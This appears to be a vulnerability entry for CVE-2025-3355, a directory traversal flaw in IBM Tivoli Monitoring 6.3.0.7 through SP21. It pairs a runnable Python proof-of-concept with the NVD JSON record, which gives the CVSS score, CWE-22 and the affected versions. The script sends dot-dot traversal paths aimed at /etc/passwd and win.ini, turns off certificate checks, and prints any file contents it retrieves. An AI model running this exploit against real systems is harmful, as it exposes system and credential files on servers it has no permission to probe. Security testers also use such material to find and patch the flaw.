CVE-2025-3355

# CVE-2025-3355 Path Traversal PoC # Target: IBM Tivoli Monitoring 6.3.0.7 - 6.3.0.7 SP21 # Type: Directory Traversal import requests import sys TARGET_URL = "https://target-ibm-tivoli.com" def test_path_traversal(): """Test for CVE-2025-3355 Path Traversal vulnerability""" # Common sensitive files to test test_paths = [ "/../../../../etc/passwd", "/..\..\..\..\windows\win.ini", "/file/view?path=../../../../etc/passwd", "/scripts/..\../..\..\etc/passwd" ] headers = { "User-Agent": "Mozilla/5.0 (compatible; CVE-2025-3355-Test)", "Accept": "*/*" } print(f"[*] Testing CVE-2025-3355 on {TARGET_URL}") print(f"[*] Target: IBM Tivoli Monitoring Path Traversal") for path in test_paths: url = f"{TARGET_URL}{path}" print(f"\n[+] Testing: {url}") try: response = requests.get(url, headers=headers, timeout=10, verify=False) if response.status_code == 200: # Check if response contains file content if "root:" in response.text or "[extensions]" in response.text: print(f"[!] VULNERABLE! Retrieved file content:") print(response.text[:500]) return True elif response.status_code == 403: print(f"[-] Access forbidden (may indicate traversal attempt detected)") else: print(f"[-] Status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") print("\n[*] Testing completed. No obvious vulnerability detected.") return False if __name__ == "__main__": test_path_traversal()

{"cve": {"id": "CVE-2025-3355", "sourceIdentifier": "[email protected]", "published": "2025-10-30T20:15:38.673", "lastModified": "2025-11-07T01:58:25.360", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Tivoli Monitoring 6.3.0.7 through 6.3.0.7 Service Pack 21 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing \"dot dot\" sequences (/../) to view arbitrary files on the system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:-:*:*:*:*:*:*", "matchCriteriaId": "15633ADC-6913-4AA1-8524-F139895B1C9D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp1:*:*:*:*:*:*", "matchCriteriaId": "F8F29F79-3813-4B6F-A0FE-3E12711F2827"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp10:*:*:*:*:*:*", "matchCriteriaId": "63F43D7A-2BB8-475A-9F95-5AD83FC2F1E1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp11:*:*:*:*:*:*", "matchCriteriaId": "89FE6200-3F7A-43E6-B9DB-24D1B956A509"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp12:*:*:*:*:*:*", "matchCriteriaId": "8632DB2C-4814-43F9-8AA9-682FB000CDC7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp13:*:*:*:*:*:*", "matchCriteriaId": "9D1B4834-85E5-4E41-9886-03BFD8424FF2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp14:*:*:*:*:*:*", "matchCriteriaId": "54AE7933-034F-459B-8C02-2850D3153437"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp15:*:*:*:*:*:*", "matchCriteriaId": "643F4560-5049-466D-B4BA-18DDBBD2BEB2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp16:*:*:*:*:*:*", "matchCriteriaId": "3698F091-E08C-4B5C-9E85-1729A19A914F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp17:*:*:*:*:*:*", "matchCriteriaId": "DA218FEA-1091-4098-8A4C-3557924A27EE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp18:*:*:*:*:*:*", "matchCriteriaId": "6993220C-C737-4876-8E52-1C0CB9F109A5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp19:*:*:*:*:*:*", "matchCriteriaId": "2AAFF1A2-750F-4C08-B544-0D6BC56D2048"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp2:*:*:*:*:*:*", "matchCriteriaId": "056BA0BC-CA53-4103-AA0A-692226602765"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp20:*:*:*:*:*:*", "matchCriteriaId": "68430D8F-B043-4179-860E-D4DADB7203E1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp21:*:*:*:*:*:*", "matchCriteriaId": "B9984364-3AFB-4E06-97B0-53B7D5657882"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp3:*:*:*:*:*:*", "matchCriteriaId": "FC469C26-0D30-40CF-8A24-AC7940DD9D44"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp4:*:*:*:*:*:*", "matchCriteriaId": "2E6529C0-2017-413A-9FF8-D3D09475E867"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp5:*:*:*:*:*:*", "matchCriteriaId": "BF411C3F-AB57-4F4B-92C7-6F6C142F2F64"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp6:*:*:*:*:*:*", "matchCriteriaId": "C6BC45D1-9BE9-44FC-A99A-FF99F7393274"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp7:*:*:*:*:*:*", "matchCriteriaId": "53D77364-F817-4BE8-BF25-1537180B06DE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp8:*:*:*:*:*:*", "matchCriteriaId": "680F331C-D4C7-4280-9981-9848BAE460C4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp9:*:*:*:*:*:*", "matchCriteriaId": "3C280072-A982-4A9F-A740-00838B72259B"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7249694", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}